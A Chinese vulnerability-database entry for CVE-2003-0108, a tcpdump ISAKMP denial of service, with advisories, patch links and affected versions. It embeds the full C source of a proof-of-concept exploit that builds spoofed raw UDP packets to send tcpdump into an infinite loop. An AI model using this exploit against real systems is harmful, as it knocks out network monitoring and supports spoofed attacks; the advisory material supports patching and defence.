CVE-2003-0108
CVSS5.0
发布时间 :2003-03-07 00:00:00
修订时间 :2016-10-17 22:29:37
NMCOES    

[原文]isakmp_sub_print in tcpdump 3.6 through 3.7.1 allows remote attackers to cause a denial of service (CPU consumption) via a certain malformed ISAKMP packet to UDP port 500, which causes tcpdump to enter an infinite loop.


[CNNVD]TCPDump畸形ISAKMP包远程拒绝服务攻击漏洞(CNNVD-200303-041)

        TCPDUMP是广泛用于网络分析的工具,可对匹配的表达式打印出相对网络接口的包信息,具体可参看 http://www.tcpdump.org 。
        TCPDUMP在解析畸形ISAKMP包时存在漏洞,远程攻击者可以利用这个漏洞使TCPDUMP进入无限循环而导致拒绝服务。远程用户可以生成特殊的ISAKMP包让TCPDUMP解析,可使TCPDUMP进入无限循环而不能再检测网络通信。攻击者要匿名触发此漏洞,需要伪造恶意包的源地址。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:lbl:tcpdump:3.7
cpe:/a:lbl:tcpdump:3.6.2
cpe:/a:lbl:tcpdump:3.7.1
cpe:/a:lbl:tcpdump:3.5.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0108
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0108
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-041
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000629
(UNKNOWN)  CONECTIVA  CLA-2003:629
http://marc.info/?l=bugtraq&m=104637420104189&w=2
(UNKNOWN)  BUGTRAQ  20030227 iDEFENSE Security Advisory 02.27.03: TCPDUMP Denial of Service Vulnerability in ISAKMP Packet Parsin
http://marc.info/?l=bugtraq&m=104678787109030&w=2
(UNKNOWN)  BUGTRAQ  20030304 [OpenPKG-SA-2003.014] OpenPKG Security Advisory (tcpdump)
http://www.debian.org/security/2003/dsa-255
(VENDOR_ADVISORY)  DEBIAN  DSA-255
http://www.idefense.com/advisory/02.27.03.txt
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/advisory/02.27.03.txt
http://www.iss.net/security_center/static/11434.php
(VENDOR_ADVISORY)  XF  tcpdump-isakmp-dos(11434)
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:027
(UNKNOWN)  MANDRAKE  MDKSA-2003:027
http://www.novell.com/linux/security/advisories/2003_015_tcpdump.html
(UNKNOWN)  SUSE  SuSE-SA:2003:0015
http://www.redhat.com/support/errata/RHSA-2003-032.html
(UNKNOWN)  REDHAT  RHSA-2003:032
http://www.redhat.com/support/errata/RHSA-2003-085.html
(UNKNOWN)  REDHAT  RHSA-2003:085
http://www.redhat.com/support/errata/RHSA-2003-214.html
(UNKNOWN)  REDHAT  RHSA-2003:214
http://www.securityfocus.com/bid/6974
(VENDOR_ADVISORY)  BID  6974

- 漏洞信息

TCPDump畸形ISAKMP包远程拒绝服务攻击漏洞
中危 设计错误
2003-03-07 00:00:00 2012-11-30 00:00:00
远程  
        TCPDUMP是广泛用于网络分析的工具,可对匹配的表达式打印出相对网络接口的包信息,具体可参看 http://www.tcpdump.org 。
        TCPDUMP在解析畸形ISAKMP包时存在漏洞,远程攻击者可以利用这个漏洞使TCPDUMP进入无限循环而导致拒绝服务。远程用户可以生成特殊的ISAKMP包让TCPDUMP解析,可使TCPDUMP进入无限循环而不能再检测网络通信。攻击者要匿名触发此漏洞,需要伪造恶意包的源地址。

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-255

        LBL
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        LBL Upgrade tcpdump-3.7.2.tar.gz
        
        http://www.tcpdump.org/release/tcpdump-3.7.2.tar.gz

        MandrakeSoft
        ------------
        MandrakeSoft已经为此发布了一个安全公告(MDKSA-2003:027)以及相应补丁:
        MDKSA-2003:027:Updated tcpdump packages fix denial of service vulnerabilities
        链接:
        http://www.linux-mandrake.com/en/security/2003/2003-027.php

        补丁下载:
        Updated Packages:
        Corporate Server 2.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm
        Mandrake Linux 8.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm
        Mandrake Linux 8.1/IA64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/libpcap0-0.7.2-1.1mdk.ia64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.ia64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/tcpdump-3.7.2-1.1mdk.ia64.rpm
        ftp://download.sourceforge.net/pub/m

- 漏洞信息 (22294)

TCPDump 3.x Malformed ISAKMP Packet Denial Of Service Vulnerability (EDBID:22294)
linux dos
2003-03-01 Verified
0 The Salvia Twist
N/A [点击下载]
source: http://www.securityfocus.com/bid/6974/info

It has been reported that tcpdump is vulnerable to a denial of service when some packet types are received. By sending a maliciously formatted packet to a system using a vulnerable version of tcpdump, it is possible for a remote user to cause tcpdump to ignore network traffic from the time the packet is received until the application is terminated and restarted.

/*
 * ST-tcphump.c -- tcpdump ISAKMP denial of service attack
 * 	The Salvia Twist
 * 	01/03/03
 * 
 * "A vulnerability exists in the parsing of ISAKMP packets (UDP port 500)
 *  that allows an attacker to force TCPDUMP into an infinite loop upon
 *  receipt of a specially crafted packet."
 *
 * The fault really lies in isakmp_sub0_print() not isakmp_sub_print().
 * 
 * Sometimes spoofed packets don't reach their destination, so we have support 
 * for non-spoofed packets.
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <linux/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <sys/socket.h>
#include <unistd.h>

#define ISAKMPGEN_SIZE	sizeof(struct isakmpgen)
#define ISAKMPHEAD_SIZE sizeof(struct isakmphdr)
#define PSDHEAD_SIZE	sizeof(struct pseudohdr)
#define UDPHEAD_SIZE	sizeof(struct udphdr)
#define IPHEAD_SIZE	sizeof(struct iphdr)
#define PORT		500

struct isakmpgen * isakmpg(void);
struct isakmphdr * isakmph(void);
struct udphdr * udph(void);
struct iphdr * iph(void);
__u16 cksum(__u16 *buf, int nbytes);
void get_interface(void);
void usage(void);

struct isakmpgen {
	__u8 np;
	__u8 reserved;
	__u16 length;
};

struct isakmphdr {
	__u8 i_ck[8];
	__u8 r_ck[8];
	__u8 np;
	__u8 vers;
	__u8 etype;
	__u8 flags;
	__u8 msgid[4];
	__u32 len;
};

struct pseudohdr {
	__u32 saddr;
	__u32 daddr;
	__u8 zero;
	__u8 protocol;
	__u16 length;
};

struct sockaddr_in saddr;
struct sockaddr_in local;
int spoof;

int main(int argc, char *argv[]) {
	char *packet = malloc(4096);
	char *pseudo = malloc(4096);
	struct isakmpgen *isakmpgen = malloc(ISAKMPGEN_SIZE);
	struct isakmphdr *isakmp = malloc(ISAKMPHEAD_SIZE);
	struct pseudohdr *phdr = malloc(PSDHEAD_SIZE);
	struct udphdr	*udp = malloc(UDPHEAD_SIZE);
	struct iphdr	*ip = malloc(IPHEAD_SIZE);
	int sock = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
	int one = 1;
	const int *val = &one;
	
	printf("ST-tcphump tcpdump ISAKMP denial of service\n");
	printf("	The Salvia Twist\n");
	
	if(argc < 2) {
		usage();
		exit(1);
	}
	
	if(!strcmp(argv[1], "-s"))
		spoof = 0;
	else {
		spoof = 1;
		get_interface();
	}
			
	if(!spoof && argc < 3) {
		usage();
		exit(1);
	}
	
	bzero(packet, sizeof(packet));
	bzero(pseudo, sizeof(pseudo));
	srand(time(NULL));
	
	saddr.sin_family = AF_INET;
	saddr.sin_port = htons(PORT);
	
	if(spoof)
		saddr.sin_addr.s_addr = inet_addr(argv[1]);
	else
		saddr.sin_addr.s_addr = inet_addr(argv[2]);
	
	setsockopt(sock, IPPROTO_IP, IP_HDRINCL, val, sizeof(one));
	
	ip = iph();
	udp = udph();
	isakmp = isakmph();
	isakmpgen = isakmpg();
	
	memcpy(&phdr->saddr, &ip->saddr, 4);
	memcpy(&phdr->daddr, &ip->daddr, 4);
	phdr->protocol = 17;
	phdr->length = htons(UDPHEAD_SIZE + ISAKMPHEAD_SIZE + ISAKMPGEN_SIZE);
	
	memcpy(pseudo, phdr, PSDHEAD_SIZE);
	memcpy(pseudo + PSDHEAD_SIZE, udp, UDPHEAD_SIZE);
	memcpy(pseudo + PSDHEAD_SIZE + UDPHEAD_SIZE, isakmp, ISAKMPHEAD_SIZE);
	memcpy(pseudo + PSDHEAD_SIZE + UDPHEAD_SIZE + ISAKMPHEAD_SIZE,
			isakmpgen, ISAKMPGEN_SIZE);
	
	udp->check = cksum((u_short*) pseudo, PSDHEAD_SIZE + UDPHEAD_SIZE +
			ISAKMPHEAD_SIZE + ISAKMPGEN_SIZE);
	
	memcpy(packet, ip, IPHEAD_SIZE);
	memcpy(packet + IPHEAD_SIZE, udp, UDPHEAD_SIZE);
	memcpy(packet + IPHEAD_SIZE + UDPHEAD_SIZE, isakmp, ISAKMPHEAD_SIZE);
	memcpy(packet + IPHEAD_SIZE + UDPHEAD_SIZE + ISAKMPHEAD_SIZE,
			isakmpgen, ISAKMPGEN_SIZE);
		
	ip->check = cksum((u_short*) packet, ip->tot_len >> 1);
	memcpy(packet, ip, IPHEAD_SIZE);

	if(sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *) &saddr,
				sizeof(saddr)) < 0) {
		printf("sendto error\n");
		exit(1);
	}
	
	printf("Packet sent.\n");
	
	return 0;
}

void usage(void) {
	printf("\nUsage: ST-tcphump -s <target addr>\n");
	printf("\t-s\tdon't spoof source address\n");
}

__u16 cksum(__u16 *buf, int nbytes) {
	__u32 sum;
	__u16 oddbyte;

	sum = 0;
	while(nbytes > 1) {
		sum += *buf++;
		nbytes -= 2;
	}

	if(nbytes == 1) {
		oddbyte = 0;
		*((__u16 *) &oddbyte) = *(__u8 *) buf;
		sum += oddbyte;
	}

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);

	return (__u16) ~sum;
}

struct isakmpgen * isakmpg(void) {
	struct isakmpgen *isakmpg = malloc(ISAKMPGEN_SIZE);

	bzero(isakmpg, ISAKMPGEN_SIZE);
	isakmpg->np = 69;
}

struct isakmphdr * isakmph(void) {
	struct isakmphdr *isakmph = malloc(ISAKMPHEAD_SIZE);
	int i;
	
	bzero(isakmph, ISAKMPHEAD_SIZE);
	for(i = 0; i < 8; i++) {
		isakmph->i_ck[i] = rand() % 256;
		isakmph->r_ck[i] = rand() % 256;
	}
	for(i = 0; i < 4; i++)
		isakmph->msgid[i] = rand() % 256;
	isakmph->vers = 0x8 << 4 | 0x9;
	isakmph->np = 69;
	isakmph->etype = 2;
	isakmph->len = htonl(ISAKMPHEAD_SIZE + ISAKMPGEN_SIZE);
}

struct udphdr * udph(void) {
	struct udphdr *udph = malloc(UDPHEAD_SIZE);

	udph->source = htons(PORT);//htons(1024 + (rand() % 2003));
	udph->dest = htons(PORT);
	udph->len = UDPHEAD_SIZE + ISAKMPHEAD_SIZE + ISAKMPGEN_SIZE;
	udph->check = 0;
}

struct iphdr * iph(void) {
	struct iphdr *iph = malloc(IPHEAD_SIZE);

	iph->ihl = 5;
	iph->version = 4;
	iph->tos = 0;
	iph->tot_len = IPHEAD_SIZE + UDPHEAD_SIZE + ISAKMPHEAD_SIZE + 
		ISAKMPGEN_SIZE;
	iph->id = htons(rand());
	iph->frag_off = 0;
	iph->ttl = 225;
	iph->protocol = 17;
	iph->check = 0;

	if(spoof) {
		iph->saddr = saddr.sin_addr.s_addr;
	}
	else
		iph->saddr = local.sin_addr.s_addr;
	
	iph->daddr = saddr.sin_addr.s_addr;
	
	return iph;
}

/* thanks hping2 */
void get_interface(void) {
	int sockr, len, on = 1;
	struct sockaddr_in dest;
	struct sockaddr_in iface;

	memset(&iface, 0, sizeof(iface));
	memcpy(&dest, &saddr, sizeof(struct sockaddr_in));
	dest.sin_port = htons(11111);

	sockr = socket(AF_INET, SOCK_DGRAM, 0);

	if(setsockopt(sockr, SOL_SOCKET, SO_BROADCAST, &on, sizeof(on)) == -1) {
		printf("getsockopt error\n");
		exit(1);
	}

	if(connect(sockr, (struct sockaddr *)&dest,
				sizeof(struct sockaddr_in)) == -1) {
		printf("connect error\n");
		exit(1);
	}

	len = sizeof(iface);
	if(getsockname(sockr, (struct sockaddr *)&iface, &len) == -1) {
		printf("getsockname error\n");
		exit(1);
	}
	
	close(sockr);
	memcpy(&local, &iface, sizeof(struct sockaddr_in));
	return;
}


		

- 漏洞信息

8811
tcpdump ISAKMP isakmp_sub_print DoS
Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-02-27 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

TCPDump Malformed ISAKMP Packet Denial Of Service Vulnerability
Design Error 6974
Yes No
2003-02-27 12:00:00 2009-07-11 08:06:00
Discovery of this vulnerability is credited to Andrew Griffiths <andrewg@d2.net.au>

- 受影响的程序版本

S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0
LBL tcpdump 3.7.1
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ S.u.S.E. Linux 8.1
LBL tcpdump 3.7
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
+ FreeBSD FreeBSD 4.5 -STABLE
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4 -STABLE
+ FreeBSD FreeBSD 4.4 -RELENG
+ FreeBSD FreeBSD 4.4
+ FreeBSD FreeBSD 4.3 -STABLE
+ FreeBSD FreeBSD 4.3 -RELENG
+ FreeBSD FreeBSD 4.3 -RELEASE
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2 -STABLE
+ FreeBSD FreeBSD 4.2 -RELEASE
+ FreeBSD FreeBSD 4.2
LBL tcpdump 3.6.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ HP Secure OS software for Linux 1.0
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
LBL tcpdump 3.5.2
LBL tcpdump 3.7.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.1
+ Turbolinux Turbolinux Workstation 6.0
LBL tcpdump 3.4 a6
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ S.u.S.E. Firewall Adminhost VPN
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux Admin-CD for Firewall
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Enterprise Server for S/390
+ S.u.S.E. Linux Live-CD for Firewall
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 7

- 不受影响的程序版本

LBL tcpdump 3.7.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.1
+ Turbolinux Turbolinux Workstation 6.0
LBL tcpdump 3.4 a6
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ S.u.S.E. Firewall Adminhost VPN
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux Admin-CD for Firewall
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Enterprise Server for S/390
+ S.u.S.E. Linux Live-CD for Firewall
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 7

- 漏洞讨论

It has been reported that tcpdump is vulnerable to a denial of service when some packet types are received. By sending a maliciously formatted packet to a system using a vulnerable version of tcpdump, it is possible for a remote user to cause tcpdump to ignore network traffic from the time the packet is received until the application is terminated and restarted.

- 漏洞利用

The following proof of concept exploit was supplied:

- 解决方案

SuSE has released an advisory (SuSE-SA:2004:002), which contains fixes to address this issue. Further information about obtaining and applying fixes can be found in the advisory.

Conectiva have released an advisory (CLA-2003:629). Information about obtaining and applying fixes are available in the referenced advisory.

OpenPKG have released an advisory (OpenPKG-SA-2003.014). Information about obtaining and applying fixes are available in the referenced advisory.

MandrakeSoft has released an advisory. Information about obtaining and applying fixes are available in the referenced advisory.

Gentoo Linux has released an advisory. Users who have installed net-analyzer/tcpdump are advised to upgrade to tcpdump-3.7.2 by issuing the following commands:

emerge sync
emerge -u tcpdump
emerge clean

SuSE has released an advisory (SuSE-SA:2003:0015) which contains fixes. Further information about obtaining and applying fixes can be found in the advisory.

Red Hat has released a security advisory (RHSA-2003:032-01) that contains fixes addressing this and other tcpdump issues. Users are advised to upgrade as soon as possible.

OpenPKG has released an advisory OpenPKG-SA-2004.002 to address this and other issues. Please see the referenced advisory for more information.

The following fixes are available:


LBL tcpdump 3.5.2

LBL tcpdump 3.6.2

LBL tcpdump 3.7

LBL tcpdump 3.7.1

S.u.S.E. Linux 8.0

S.u.S.E. Linux 8.1

S.u.S.E. Linux Personal 8.2

S.u.S.E. Linux Personal 9.0

S.u.S.E. Linux Personal 9.0 x86_64

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站